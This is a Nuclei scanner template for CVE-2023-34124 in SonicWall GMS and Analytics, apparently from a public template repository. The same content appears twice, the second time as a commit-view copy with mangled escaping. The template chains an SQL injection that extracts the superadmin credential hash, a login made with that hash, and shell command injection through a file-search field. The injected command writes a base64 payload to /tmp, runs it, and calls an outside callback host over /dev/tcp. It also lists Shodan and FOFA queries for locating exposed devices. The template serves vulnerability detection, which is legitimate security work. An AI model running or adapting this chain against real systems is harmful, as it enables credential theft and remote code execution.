nuclei-templates/http/cves/2023/CVE-2023-34124.yaml

id: CVE-2023-34124

info:
  name: Sonicwall Shell Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass.This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-287,CWE-305
  metadata:
    max-request: 4
    shodan-query: http.html:"/sgms/css/martini.css"
    fofa-query: body="/sgms/css/martini.css"
    verified: true
  tags: cve,cve2023,sonicwall,gsm,instrusive

variables:
 callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
 filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "/TO_BE_UPDATED"}
        Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
        Accept: */*

      - |
        GET /appliance/login HTTP/1.1
        Host: {{Hostname}}
        
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0

      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3becho+

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "<title>SonicWall Universal Management Appliance</title>"
          - "<title>SonicWall Universal Management Host</title>"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
        - type: json
          part: body
          internal: true
          name: alias
          json:
            - '.alias'

        - type: regex
          part: body
          group: 1
          internal: true
          name: servertoken
          regex:
            - "getPwdHash.*,'([0-9]+)'"
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`id: CVE-2023-34124`

			`info:`
			`name: Sonicwall Shell Injection`
			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
			`description: \|`
			`The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass.This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.`
			`reference:`
			`- https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb`
			`- https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis`
			`- https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cwe-id: CWE-287,CWE-305`
			`metadata:`
			`max-request: 4`
			`shodan-query: http.html:"/sgms/css/martini.css"`
			`fofa-query: body="/sgms/css/martini.css"`
			`verified: true`
			`tags: cve,cve2023,sonicwall,gsm,instrusive`

			`variables:`
			`callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"`
			`filename: "{{rand_base(5)}}"`

			`http:`
			`- raw:`
			`- \|`
			`GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1`
			`Host: {{Hostname}}`
			`Auth: {"user": "system", "hash": "/TO_BE_UPDATED"}`
			`Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3`
			`Accept: /`

			`- \|`
			`GET /appliance/login HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`POST /appliance/applianceMainPage HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.:",""))) }}&password={{replace_regex(alias,"^.:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0`

			`- \|`
			`POST /appliance/applianceMainPage HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+\|+uudecode+%3b/tmp/.{{filename}}%3becho+`

			`cookie-reuse: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_3`
			`words:`
			`- "<title>SonicWall Universal Management Appliance</title>"`
			`- "<title>SonicWall Universal Management Host</title>"`
			`condition: or`

			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`

			`extractors:`
			`- type: json`
			`part: body`
			`internal: true`
			`name: alias`
			`json:`
			`- '.alias'`

			`- type: regex`
			`part: body`
			`group: 1`
			`internal: true`
			`name: servertoken`
			`regex:`
			`- "getPwdHash.*,'([0-9]+)'"`